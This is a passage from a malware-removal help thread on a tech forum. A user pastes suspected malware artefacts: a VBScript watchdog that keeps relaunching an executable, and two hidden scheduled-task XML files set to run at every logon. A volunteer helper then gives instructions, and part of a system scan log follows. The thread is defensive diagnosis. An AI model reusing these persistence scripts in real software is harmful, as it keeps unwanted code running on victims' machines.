Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with Virus ( Trojan Dropper / scrips etc etc ) script file auto updates


  • This topic is locked This topic is locked
22 replies to this topic

#1 xterz

xterz

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 27 December 2017 - 10:46 PM

Hello there , I think i have been infected , after download something ( stupid of me ) i noticed a quick faded command promp appear , i rushed to scan my computer and found traces off what appeared to be a Trojan dropper .

I've run the following programs :

 

  • Malware antibytes
  • HitmanPro
  • SecurityCheck
  • EmergencyKit
  • ESETNOD32 ( for some reason didnt found the virus ??? )
  • I manually uploaded some files and traces of the virus using VirusTotal

The problem is , some tracers of the virus ( xml , scripts and logs are still here and what's alarming is one txt file containing script lines keeps getting updated after a reboot  despite all the scans done )

  • There is this  xml file called exacly xml that seems to remote to an non extension file called by x
  •  There is an second one called xxml that calls to another non extension file called by xx file
  • The xx file shares the time stamp of the xxml and AppVShNotifyt.txt ( The script file that autoupdates each boot so as the xx file ) 
  • A dll , shares the same time stamp as the others ;  MCconfig.dll  checked with both anti virus and uploaded to VirustTotal but no results , still is pretty suspicious.
  • Other file that shares the same time stamp WindowsCodecsRaw.txt  here's some similarities in behavior http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/HPmal~Fareit-B/detailed-analysis.aspx    [ Do notice the x , xml , and mcconfig file drop similarity ] 

     

So far what's been removed by the anti virus AppVShNotifyt.exe , but the tracers are still here , the file's keep getting updated , seems like the virus masked himself or is it running in other ways services etc etc ?

Here's what  AppVShNotifyt.txt  is :

Option Explicit
Dim ProcessPath,WshShell
ProcessPath = "%Windir%\System32\Notepad.exe"
Set WshShell = CreateObject("WScript.Shell")
If AppPrevInstance() Then 
    MsgBox "There is an existing proceeding !" & VbCrLF &_
    CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"    
    WScript.Quit   
Else 
    Do
        Pause(10) ' Pause 10 seconds 
        If CheckProcess(DblQuote(ProcessPath)) = False Then
            Call Logoff() 
        End If  
    Loop
End If
'**************************************************************************
Function CheckProcess(ProcessPath)
    Dim strComputer,objWMIService,colProcesses,Tab,ProcessName
    strComputer = "."
    Tab = Split(ProcessPath,"\")
    ProcessName = Tab(UBound(Tab))
    ProcessName = Replace(ProcessName,Chr(34),"")
    Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colProcesses = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = '"& ProcessName & "'")
    If colProcesses.Count = 0 Then
        CheckProcess = False
    Else
        CheckProcess = True
    End if
End Function
'**************************************************************************
Function DblQuote(Str)
    DblQuote = Chr(34) & Str & Chr(34)
End Function
'**************************************************************************
Sub Logoff()
   Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Exec("C:\Users\Sblck\AppData\Local\AppVShNotifyt.exe")
Set objShell = Nothing
Wscript.Quit 
End sub
'**************************************************************************
Sub Pause(Secs)    
    Wscript.Sleep(Secs * 1000)    
End Sub   
'**************************************************************************
Function AppPrevInstance()   
    With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")   
        With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _
            " AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'")   
            AppPrevInstance = (.Count > 1)   
        End With   
    End With   
End Function    
'***************************************************************************
Function CommandLineLike(ProcessPath)   
    ProcessPath = Replace(ProcessPath, "\", "\\")   
    CommandLineLike = "'%" & ProcessPath & "%'"   
End Function
'****************************************************************************

Following AppVShNotifytvbs.vbs :
 

Option Explicit
Dim ProcessPath,WshShell
ProcessPath = "%Windir%\System32\Notepad.exe"
Set WshShell = CreateObject("WScript.Shell")
If AppPrevInstance() Then 
    MsgBox "There is an existing proceeding !" & VbCrLF &_
    CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"    
    WScript.Quit   
Else 
    Do
        Pause(10) ' Pause 10 seconds 
        If CheckProcess(DblQuote(ProcessPath)) = False Then
            Call Logoff() 
        End If  
    Loop
End If
'**************************************************************************
Function CheckProcess(ProcessPath)
    Dim strComputer,objWMIService,colProcesses,Tab,ProcessName
    strComputer = "."
    Tab = Split(ProcessPath,"\")
    ProcessName = Tab(UBound(Tab))
    ProcessName = Replace(ProcessName,Chr(34),"")
    Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colProcesses = objWMIService.ExecQuery _
    ("Select * from Win32_Process Where Name = '"& ProcessName & "'")
    If colProcesses.Count = 0 Then
        CheckProcess = False
    Else
        CheckProcess = True
    End if
End Function
'**************************************************************************
Function DblQuote(Str)
    DblQuote = Chr(34) & Str & Chr(34)
End Function
'**************************************************************************
Sub Logoff()
   Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Exec("C:\Users\Sblck\AppData\Local\AppVShNotifyt.exe")
Set objShell = Nothing
Wscript.Quit 
End sub
'**************************************************************************
Sub Pause(Secs)    
    Wscript.Sleep(Secs * 1000)    
End Sub   
'**************************************************************************
Function AppPrevInstance()   
    With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")   
        With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _
            " AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'")   
            AppPrevInstance = (.Count > 1)   
        End With   
    End With   
End Function    
'***************************************************************************
Function CommandLineLike(ProcessPath)   
    ProcessPath = Replace(ProcessPath, "\", "\\")   
    CommandLineLike = "'%" & ProcessPath & "%'"   
End Function
'****************************************************************************

And xml 
 

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2001-10-25T14:27:44.8929027</Date>
    <Author>%i%</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
            <Enabled>true</Enabled>
      <UserId>%i%</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>true</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>%i%</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>%path%</Command>
    </Exec>
  </Actions>
</Task>

Also XXML :
 

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2001-10-25T14:27:44.8929027</Date>
    <Author>%i%</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
            <Enabled>true</Enabled>
      <UserId>%i%</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>true</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>%i%</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>%path%</Command>
    </Exec>
  </Actions>
</Task>

Edited by xterz, 27 December 2017 - 10:49 PM.


BC AdBot (Login to Remove)

 


#2 xterz

xterz
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 27 December 2017 - 10:57 PM

Since the 1 Post was to big Im going to continue with multi reply's to try and split the information.

A screenshot of the files mentioned :

nvRpOSD.jpg


Edited by xterz, 27 December 2017 - 11:03 PM.


#3 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,416 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:08:06 PM

Posted 28 December 2017 - 09:50 AM

Greetings xterz and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far.

Please do this.

===================================================

Farbar Recovery Scan Tool (FRST)

--------------------
  • Download Farbar Recover Scan Tool for either 32 bit or 64 bit systems and save it to your Desktop. <<< Important
  • Double click the icon
  • Click Yes to the disclaimer
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of each report in separate reply windows
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • FRST results
  • Addition log

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"May you be richly rewarded by the Lord, the God of Israel, under whose wings you have come to take refuge."

#4 xterz

xterz
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE
  •  
  • Local time:03:06 AM

Posted 28 December 2017 - 11:21 AM

Hello !
First i wanna say thank you for your attention.

Here are the files requested.

FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 26-12-2017
Ran by Sblck (administrator) on SBLCK-PC (28-12-2017 16:02:46)
Running from F:\Desktop\DesktopC
Loaded Profiles: Sblck (Available Profiles: Sblck)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Scarlet.Crush Productions) C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
() C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
() D:\Programs\Core Temp\Core Temp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
() F:\WinAuth-3.5.1\WinAuth.exe
() F:\Games\SteamLibrary\steamapps\common\wallpaper_engine\wallpaper64.exe
(Scarlet.Crush Productions) C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpTrayApp.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
() C:\Program Files (x86)\RivaTuner Statistics Server\RTSS.exe
() C:\Program Files (x86)\RivaTuner Statistics Server\EncoderServer.exe
() C:\Program Files (x86)\RivaTuner Statistics Server\RTSSHooksLoader64.exe
(Samsung Electronics Co. Ltd.) C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
() F:\Program Files (x86)\SpeedFan\speedfan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-01-11] (Realtek Semiconductor)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [284440 2011-04-29] (Intel Corporation)
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3111712 2017-12-15] (Valve Corporation)
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Run: [WinAuth] => F:\WinAuth-3.5.1\WinAuth.exe [5781576 2016-06-07] ()
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Run: [Gaijin.Net Agent] => "C:\Users\Sblck\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe"
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Run: [WallpaperEngine] => F:\Games\SteamLibrary\steamapps\common\wallpaper_engine\wallpaper64.exe [1766376 2017-11-23] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScpToolkit Tray Notifications.lnk [2016-10-08]
ShortcutTarget: ScpToolkit Tray Notifications.lnk -> C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpTrayApp.exe (Scarlet.Crush Productions)
GroupPolicy: Restriction <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{86CDD8DF-610B-458D-8F52-08486E90ABC2}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{86CDD8DF-610B-458D-8F52-08486E90ABC2}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{A97F8278-8DA8-49C6-A814-8E256C06EA09}: [DhcpNameServer] 7.254.254.254
Tcpip\..\Interfaces\{D9308FC8-B464-42EA-B45C-C471171FC41B}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{F3D3A03E-51F4-4ABA-8071-D4DF9EAF1825}: [DhcpNameServer] 185.156.172.178 185.93.180.131 83.143.245.42

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_144\bin\ssv.dll [2017-08-14] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-14] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-14] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-14] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: y0hfqnbv.default
FF ProfilePath: C:\Users\Sblck\AppData\Roaming\Mozilla\Firefox\Profiles\y0hfqnbv.default [2017-12-28]
FF Extension: (Live HTTP headers) - C:\Users\Sblck\AppData\Roaming\Mozilla\Firefox\Profiles\y0hfqnbv.default\Extensions\{8f8fe09b-0bd3-4470-bc1b-8cad42b8203a} [2017-06-22] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_148.dll [2017-04-22] ()
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-14] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-14] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2017-09-20] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-22] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-01-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-14] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-14] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-12-05] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-12-05] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> F:\Programs\VLC\npvlc.dll [2017-05-24] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-11-04] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-09-20] (Adobe Systems)
FF Plugin HKU\S-1-5-21-2661263523-112610016-3866790350-1000: SkypePlugin -> C:\Users\Sblck\AppData\Local\SkypePlugin\7.32.6.278\npGatewayNpapi.dll [2017-04-18] (Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-2661263523-112610016-3866790350-1000: SkypePlugin64 -> C:\Users\Sblck\AppData\Local\SkypePlugin\7.32.6.278\npGatewayNpapi-x64.dll [2017-04-18] (Skype Technologies S.A.)

Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.pt/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default [2017-12-28]
CHR Extension: (Apresentações) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-12]
CHR Extension: (Documentos) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-12]
CHR Extension: (Google Drive) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-27]
CHR Extension: (Chamadas do Skype) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\blakpkgjpemejpbmfiglncklihnhjkij [2017-09-28]
CHR Extension: (YouTube) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-27]
CHR Extension: (uBlock Origin) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2017-12-20]
CHR Extension: (Tampermonkey) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2017-09-14]
CHR Extension: (Adobe Acrobat) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-03-03]
CHR Extension: (VTchromizer) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\efbjojhplkelaegfbieplglfidafgoka [2017-01-16]
CHR Extension: (Block site) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\eiimnmioipafcokbfikbljfdeojpcgbh [2017-12-03]
CHR Extension: (Streamkeys) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekpipjofdicppbepocohdlgenahaneen [2017-12-25]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2017-11-21]
CHR Extension: (Folhas de cálculo) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-12]
CHR Extension: (HTTPS Everywhere) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcbommkclmclpchllfjekcdonpmejbdp [2017-12-07]
CHR Extension: (Documentos do Google offline) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-27]
CHR Extension: (No Coin - Block miners on the web!) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\gojamcfopckidlocpkbelmpjcgmbgjcl [2017-12-16]
CHR Extension: (Pagamentos via Chrome Web Store) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Enhanced Steam) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\okadibdjfemgnhjiembecghcbfknbfhg [2017-12-10]
CHR Extension: (Gmail) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-27]
CHR Extension: (Chrome Media Router) - C:\Users\Sblck\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-12-09]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

Opera: 
=======
StartMenuInternet: (HKLM) OperaStable - C:\Program Files\Opera\Launcher.exe

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [817760 2017-09-20] (Adobe Systems Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [6998536 2017-12-08] ()
S3 BRSptStub; C:\ProgramData\BitRaider\BRSptStub.exe [363208 2017-12-26] (BitRaider, LLC)
S4 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-09-05] (BlueStack Systems, Inc.)
S4 CG6Service; F:\Program Files\CyberGhost 6\CyberGhost.Service.exe [232528 2017-08-31] (CyberGhost S.A.)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1468608 2016-10-06] (Disc Soft Ltd)
R2 Ds3Service; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe [394944 2016-04-12] (Scarlet.Crush Productions)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [392976 2017-02-11] (EasyAntiCheat Ltd)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [2836296 2016-12-14] (ESET)
S4 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2016-10-10] (Hi-Rez Studios) [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165144 2012-05-10] (Intel Corporation)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [4362656 2016-02-24] (INCA Internet Co., Ltd.) [File not signed]
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [463664 2017-12-05] (NVIDIA Corporation)
S4 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [460736 2017-12-05] (NVIDIA Corporation)
S4 Origin Client Service; F:\Origin\OriginClientService.exe [2134848 2017-12-09] (Electronic Arts)
S2 Origin Web Helper Service; F:\Origin\OriginWebHelperService.exe [3014472 2017-12-09] (Electronic Arts)
